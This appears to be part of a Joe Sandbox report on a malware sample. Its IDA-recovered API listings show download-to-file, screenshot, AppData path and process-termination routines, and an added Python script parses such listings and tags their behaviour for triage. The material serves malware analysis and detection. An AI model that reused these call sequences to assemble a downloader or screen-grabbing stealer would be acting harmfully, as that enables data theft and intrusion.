                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                • String ID:
                                • API String ID: 2929475105-0
                                • Opcode ID: aa7599f23a93a913508b32e2fa992bc56ad8c250cfd5c1fbc7d844fb7582cb8b
                                • Instruction ID: f1c15f74b8ba7abfb445541e34e4ee3535d75699d9897d9890d64601e2435694
                                • Opcode Fuzzy Hash: aa7599f23a93a913508b32e2fa992bc56ad8c250cfd5c1fbc7d844fb7582cb8b
                                • Instruction Fuzzy Hash: 90911970A406009FD7309FA4F848A6737E5EB58728F48A439F545BB355EBBADC40CB92
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5C8A2
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5C8D1
                                • lstrlen.KERNEL32(00000000), ref: 00E5C8FC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5C932
                                • StrCmpCA.SHLWAPI(00000000,00E74C3C), ref: 00E5C943
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: a110583ea3f916c63083ac0ae205569d059068716f7e930eae3004190faacb6b
                                • Instruction ID: cb3ffff5b384c6b12a678d376629cf858343cdc2086f5c48f63a1eb5696b029a
                                • Opcode Fuzzy Hash: a110583ea3f916c63083ac0ae205569d059068716f7e930eae3004190faacb6b
                                • Instruction Fuzzy Hash: 0561C571D103199FDB21EFB4D844AAE7BF8AF09345F206969FD42F7201D73899498BA0
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00E60CF0), ref: 00E64276
                                • GetDesktopWindow.USER32 ref: 00E64280
                                • GetWindowRect.USER32(00000000,?), ref: 00E6428D
                                • SelectObject.GDI32(00000000,00000000), ref: 00E642BF
                                • GetHGlobalFromStream.COMBASE(00E60CF0,?), ref: 00E64336
                                • GlobalLock.KERNEL32(?), ref: 00E64340
                                • GlobalSize.KERNEL32(?), ref: 00E6434D
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                • String ID:
                                • API String ID: 1264946473-0
                                • Opcode ID: 6a39a6f2180a0c43ca365558c792be27340223fa5dbc2a02a4248eb4bd6ffab6
                                • Instruction ID: e7c37cf0c1dc85c9a8f09482acd7f91bf97938fadf6c6a04498291380b7655de
                                • Opcode Fuzzy Hash: 6a39a6f2180a0c43ca365558c792be27340223fa5dbc2a02a4248eb4bd6ffab6
                                • Instruction Fuzzy Hash: 5C510E75D10208AFDB20EFA4E989AAE77B9EF48314F105519FA05B3244DB35AD058BA0
                                APIs
                                • lstrcat.KERNEL32(?,016CEC60), ref: 00E5E00D
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E5E037
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5E06F
                                • lstrcat.KERNEL32(?,00000000), ref: 00E5E07D
                                • lstrcat.KERNEL32(?,?), ref: 00E5E098
                                • lstrcat.KERNEL32(?,?), ref: 00E5E0AC
                                • lstrcat.KERNEL32(?,016BA500), ref: 00E5E0C0
                                • lstrcat.KERNEL32(?,?), ref: 00E5E0D4
                                • lstrcat.KERNEL32(?,016CDF30), ref: 00E5E0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5E11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00E5E126
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 4230089145-0
                                • Opcode ID: 9c9869fdb643424e3beba52d2726b6c90adbaffb312956366718d756ec709125
                                • Instruction ID: 000df455b31cdfa8f3ea3725302ce066c82fe1f652410d84040816263cd45f20
                                • Opcode Fuzzy Hash: 9c9869fdb643424e3beba52d2726b6c90adbaffb312956366718d756ec709125
                                • Instruction Fuzzy Hash: 4A61AD71D1011CABCB25DB64D844ADDB3B8BF48310F5049A9BA49B3341DB74AF859F90
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E46AFF
                                • InternetOpenA.WININET(00E6CFEC,00000001,00000000,00000000,00000000), ref: 00E46B2C
                                • StrCmpCA.SHLWAPI(?,016CF2C8), ref: 00E46B4A
                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00E46B6A
                                • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00E46B88
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00E46BA1
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00E46BC6
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00E46BF0
                                • CloseHandle.KERNEL32(00000000), ref: 00E46C10
                                • InternetCloseHandle.WININET(00000000), ref: 00E46C17
                                • InternetCloseHandle.WININET(?), ref: 00E46C21
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                • String ID:
                                • API String ID: 2500263513-0
                                • Opcode ID: 2596b4a1b895150ec7b9a12092135fa8642c885aa6bf04d9cb26bd1aa2d25320
                                • Instruction ID: 56a3daf5b9d94d311853ccb289b94e12ea1898a6620f30d7a56bae91a6adbfcb
                                • Opcode Fuzzy Hash: 2596b4a1b895150ec7b9a12092135fa8642c885aa6bf04d9cb26bd1aa2d25320
                                • Instruction Fuzzy Hash: 2C41B471A50209ABDB24DF64EC49FAE77B8EF44704F008559FB45F7280DB74AD408BA5
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00E54F39), ref: 00E64545
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E6454C
                                • wsprintfW.USER32 ref: 00E6455B
                                • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 00E645CA
                                • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 00E645D9
                                • CloseHandle.KERNEL32(00000000,?,?), ref: 00E645E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                • String ID: 9O$%hs$9O
                                • API String ID: 885711575-2037051700
                                • Opcode ID: 3f8409f22fc08737e8eef4530fdb13ea4546d0d96b10ae405c0c82ee7b87f156
                                • Instruction ID: fd8c21c61fd95b676262d5c4fc29da55549e1f5f30e515ef3fde5e8b6d1d10b2
                                • Opcode Fuzzy Hash: 3f8409f22fc08737e8eef4530fdb13ea4546d0d96b10ae405c0c82ee7b87f156
                                • Instruction Fuzzy Hash: 12319EB2E40208ABDB20DBA0EC49FDE7778AF44704F104059FA06F7184DB75AA418BA5
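The listings above are the raw import sequence of each function the IDA plugin recovered: a download-to-disk loop (InternetOpenA, InternetOpenUrlA, CreateFileA, then InternetReadFile and WriteFile until the stream ends), a desktop screenshot helper (GetDesktopWindow, GetWindowRect, SelectObject, with the bitmap serialised through CreateStreamOnHGlobal and GetHGlobalFromStream), and a process-termination helper that opens its target with access mask 00001001 before calling TerminateProcess. As an added example, not part of the Joe Sandbox report, the Python script below parses listings in exactly this format, tags each function block with a behaviour label, and decodes the two constants a triage analyst would otherwise look up by hand: the OpenProcess access mask and the CSIDL passed to SHGetFolderPathA. The behaviour rules and tag names are this example's own assumptions, not Joe Sandbox signatures; the embedded input is copied from the listings above, trimmed to the calls the rules need.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# One listing line: "• Func.MODULE(arg,arg), ref: ADDR" or "• Func.MODULE ref: ADDR".
# The optional "Part of subcall function X:" prefix is skipped so nested calls parse too.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<func>[A-Za-z_:][\w:]*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")

# Behaviour rules are this example's own, not Joe Sandbox signatures: a block is
# tagged when every listed API appears in it (ANSI/Unicode suffix ignored).
SIGNATURES: Dict[str, set] = {
    "download-to-file": {"InternetOpen", "InternetOpenUrl", "InternetReadFile", "CreateFile", "WriteFile"},
    "screen-capture": {"GetDesktopWindow", "GetWindowRect", "SelectObject",
                       "CreateStreamOnHGlobal", "GetHGlobalFromStream"},
    "terminate-process": {"OpenProcess", "TerminateProcess"},
}
# Subset of the documented Win32 constants, enough for the listings in this report.
PROCESS_RIGHTS = {0x0001: "PROCESS_TERMINATE", 0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
                  0x0400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}
CSIDL = {0x05: "CSIDL_PERSONAL", 0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA", 0x28: "CSIDL_PROFILE"}


@dataclass
class ApiCall:
    func: str
    module: str
    args: List[str]
    ref: int  # call-site address taken from "ref:"

    @property
    def base(self) -> str:  # CreateFileA / wsprintfW -> CreateFile / wsprintf
        return self.func[:-1] if len(self.func) > 1 and self.func[-1] in "AW" else self.func


def split_blocks(text: str) -> List[str]:
    """Cut the report text at each bare 'APIs' header; text before the first header is dropped."""
    blocks: List[List[str]] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            blocks.append([])
        elif blocks:
            blocks[-1].append(line)
    return ["\n".join(b) for b in blocks if b]


def parse_listing(block: str) -> List[ApiCall]:
    calls = []
    for m in filter(None, map(API_LINE.match, block.splitlines())):
        raw = m.group("args") or ""
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("func"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def hex_arg(arg: str) -> Optional[int]:
    """Arguments are printed as bare hex; '?' marks a value the sandbox could not resolve."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def decode_access_mask(mask: int) -> List[str]:
    names = [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]
    unknown = mask & ~sum(PROCESS_RIGHTS)  # keys are distinct bits, so their sum is their OR
    return names + ([f"0x{unknown:X}"] if unknown else [])


def explain(call: ApiCall) -> Optional[str]:
    """Decode the constant-bearing argument of OpenProcess and SHGetFolderPath."""
    if call.base == "OpenProcess" and call.args and hex_arg(call.args[0]) is not None:
        return "OpenProcess access: " + " | ".join(decode_access_mask(hex_arg(call.args[0])))
    if call.base == "SHGetFolderPath" and len(call.args) > 1 and hex_arg(call.args[1]) is not None:
        csidl = hex_arg(call.args[1])
        return "SHGetFolderPath folder: " + CSIDL.get(csidl, f"CSIDL 0x{csidl:X}")
    return None


def tag_block(calls: List[ApiCall]) -> List[str]:
    present = {c.base for c in calls}
    return [tag for tag, needed in SIGNATURES.items() if needed <= present]


def analyse(text: str) -> List[Dict[str, object]]:
    """One result per function block: call site of its first API, behaviour tags, decoded notes."""
    return [{"first_ref": f"{c[0].ref:08X}", "tags": tag_block(c), "notes": [n for n in map(explain, c) if n]}
            for c in map(parse_listing, split_blocks(text)) if c]


# Input copied from the report listings above (four function blocks, trimmed to the relevant calls).
SAMPLE = """APIs
• InternetOpenA.WININET(00E6CFEC,00000001,00000000,00000000,00000000), ref: 00E46B2C
• InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00E46B6A
• CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00E46B88
• InternetReadFile.WININET(00000000,?,00000400,?), ref: 00E46BA1
• WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00E46BC6
APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,00E60CF0), ref: 00E64276
• GetDesktopWindow.USER32 ref: 00E64280
• GetWindowRect.USER32(00000000,?), ref: 00E6428D
• SelectObject.GDI32(00000000,00000000), ref: 00E642BF
• GetHGlobalFromStream.COMBASE(00E60CF0,?), ref: 00E64336
APIs
• OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 00E645CA
• TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 00E645D9
APIs
• SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E5E037
"""

if __name__ == "__main__":
    print(*analyse(SAMPLE), sep="\n")
```

Run on the embedded sample, the four blocks come back tagged download-to-file, screen-capture and terminate-process, with the mask 00001001 expanded to PROCESS_TERMINATE | PROCESS_QUERY_LIMITED_INFORMATION (the minimum a killer needs) and 0000001A resolved to CSIDL_APPDATA. Pasting a whole "APIs" section of a report into SAMPLE works the same way; blocks that match no rule simply get an empty tag list, so the rules are a starting point to extend rather than a verdict.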
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4BC1F
                                • lstrlen.KERNEL32(00000000), ref: 00E4BC52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4BC7C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4BC84
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4BCAC
                                • lstrlen.KERNEL32(00E74AD4), ref: 00E4BD23
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: 2daf2140506f4ab8166e23639a5ab0e637d7abfebc90a256e6eef5fa3d4cd7ef
                                • Instruction ID: 0fdfe1fdd765b2fcfae0fcf19b4c2acde3aa4a5427c93491b5b9c93121f5d470
                                • Opcode Fuzzy Hash: 2daf2140506f4ab8166e23639a5ab0e637d7abfebc90a256e6eef5fa3d4cd7ef
                                • Instruction Fuzzy Hash: 47A15D30A012058FCB25DF68E989A6EB7F5AF44318F18A4ADE949FB351DB36DC41CB50
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E65F2A
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E65F49
                                • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00E66014
                                • memmove.MSVCRT(00000000,00000000,?), ref: 00E6609F
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E660D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 1975243496-4289949731
                                • Opcode ID: e5d0052a4bf607fb7252941c4587dff82a9097dcf50084c8dddd6a5833b8128a
                                • Instruction ID: 4c2272a396e6f0d61b6aeec2d01cbdc3f3e92859a416e50cfd3ac58b79afc5e4
                                • Opcode Fuzzy Hash: e5d0052a4bf607fb7252941c4587dff82a9097dcf50084c8dddd6a5833b8128a
                                • Instruction Fuzzy Hash: A361A171750604DBDB28CF5CE89496EB7B6EF84384B245A19E492E7381D731ED80CB94
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5E06F
                                • lstrcat.KERNEL32(?,00000000), ref: 00E5E07D
                                • lstrcat.KERNEL32(?,?), ref: 00E5E098
                                • lstrcat.KERNEL32(?,?), ref: 00E5E0AC
                                • lstrcat.KERNEL32(?,016BA500), ref: 00E5E0C0
                                • lstrcat.KERNEL32(?,?), ref: 00E5E0D4
                                • lstrcat.KERNEL32(?,016CDF30), ref: 00E5E0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5E11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00E5E126
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
